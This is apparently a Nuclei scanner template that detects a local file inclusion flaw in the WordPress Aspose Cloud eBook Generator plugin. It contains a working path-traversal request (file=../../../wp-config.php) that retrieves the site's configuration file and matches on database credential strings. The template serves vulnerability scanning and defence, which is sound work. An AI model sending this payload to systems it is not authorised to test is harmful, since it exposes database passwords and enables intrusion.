id: aspose-file-download

info:
  name: Wordpress Aspose Cloud eBook Generator - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Wordpress Aspose Cloud eBook Generator is vulnerable to local file inclusion.
  reference:
    - https://wpscan.com/vulnerability/7866
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,aspose,ebook

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
